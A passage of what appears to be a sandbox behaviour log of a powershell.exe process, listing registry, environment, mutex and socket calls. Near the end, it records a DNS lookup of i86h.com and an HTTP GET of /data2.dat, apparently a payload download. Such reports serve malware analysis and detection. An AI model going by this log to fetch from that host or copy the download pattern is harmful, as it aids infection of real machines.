| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HOMEPATH, result_out = \Users\BMe1N39jU1 6criBQ |
|
1 | |
| File | Get Info | filename = C:\Users\BMe1N39jU1 6criBQ, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
4 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| File | Get Info | filename = C:\Users\BMe1N39jU1 6criBQ\Documents, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\BMe1N39jU1 6criBQ, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\BMe1N39jU1 6criBQ\Documents, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\BMe1N39jU1 6criBQ, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\BMe1N39jU1 6criBQ\Documents, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HomePath, result_out = \Users\BMe1N39jU1 6criBQ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
11 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 |
Thread 0xacc
54
6
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 |
Thread 0xb4c
281
43
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = MshEnableTrace |
|
22 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes |
|
2 | |
| File | Create | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 554 |
|
1 | |
| File | Read | filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 0 |
|
1 | |
| Module | Get Filename | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| System | Get Computer Name | result_out = O5ZINUQXJZK |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Module | Map | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 | |
| System | Get Info | type = Operating System |
|
2 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Create | mutex_name = Global\.net clr networking |
|
1 | |
| Mutex | Release | mutex_name = Global\.net clr networking |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM |
|
1 | |
| DNS | Resolve Name | host = i86h.com, address_out = 217.182.53.69 |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM |
|
1 | |
| Socket | Create | protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM |
|
1 | |
| Socket | Connect | remote_address = 217.182.53.69, remote_port = 80 |
|
1 | |
| Socket | Close | type = SOCK_STREAM |
|
1 | |
| Socket | Send | flags = NO_FLAG_SET, size = 67, size_out = 67 |
|
1 | |
| Inet | Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Inet | Open Connection | protocol = http, server_name = i86h.com, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /data2.dat |
|
1 | |
| Inet | Send HTTP Request | headers = host: i86h.com, connection: Keep-Alive, url = i86h.com/data2.dat |
|
1 | |
| Socket | Receive | flags = NO_FLAG_SET, size = 4096, size_out = 562 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 562 |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
